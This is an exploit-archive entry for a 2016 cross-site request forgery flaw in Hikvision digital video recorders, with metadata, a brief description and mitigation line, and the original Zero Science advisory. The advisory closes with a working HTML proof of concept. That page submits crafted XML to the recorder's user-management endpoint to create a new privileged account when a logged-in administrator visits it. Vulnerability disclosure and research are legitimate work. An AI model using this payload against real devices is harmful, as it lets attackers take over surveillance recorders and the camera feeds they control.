Hikvision Digital Video Recorder Cross-Site Request Forgery

vendor:

Hikvision Digital Video Recorder

by:

Gjoko 'LiquidWorm' Krstic

7,5

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Hikvision Digital Video Recorder

Affected Version From: LV-D2104CS, DS-7316HFI-ST, DS-7216HVI-SV/A, DS-7208HVI-SH, DS-7204HVI-SH

Affected Version To: LV-D2104CS, DS-7316HFI-ST, DS-7216HVI-SV/A, DS-7208HVI-SH, DS-7204HVI-SH

Patch Exists: YES

Related CWE: N/A

CPE: hikvision:digital_video_recorder

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Hikvision-Webs

2016

Hikvision Digital Video Recorder Cross-Site Request Forgery

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Mitigation:

Implementing proper input validation and authentication checks can help mitigate the risk of CSRF attacks.

Source

Exploit-DB raw data:

<!--
Hikvision Digital Video Recorder Cross-Site Request Forgery


Vendor: Hikvision Digital Technology Co., Ltd
Product web page: http://www.hikvision.com
Affected version: LV-D2104CS
                  DS-7316HFI-ST
                  DS-7216HVI-SV/A
                  DS-7208HVI-SH
                  DS-7204HVI-SH

Summary: Hikvision is the global leader of video surveillance
products and solutions, manufactures a wide range of top-quality,
reliable, and professional solutions.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: Hikvision-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5315
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5315.php

Vendor: http://overseas.hikvision.com/europe/list01_435.html


13.01.2016

--


CSRF Add Operator:
------------------
-->

<html>
  <body>
    <form action="http://10.0.0.8/PSIA/Security/AAA/users" method="POST" enctype="text/plain">
      <input type="hidden" name="<&#63;xml&#32;version" value="&apos;1&#46;0&apos;&#32;encoding&#61;&apos;utf&#45;8&apos;&#63;><User><id>3<&#47;id><userName>tes2t<&#47;userName><password>test2<&#47;password><Extensions><bondIp><ipAddress>0&#46;0&#46;0&#46;0<&#47;ipAddress><&#47;bondIp><attribute><inherent>true<&#47;inherent><&#47;attribute><&#47;Extensions><&#47;User>" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>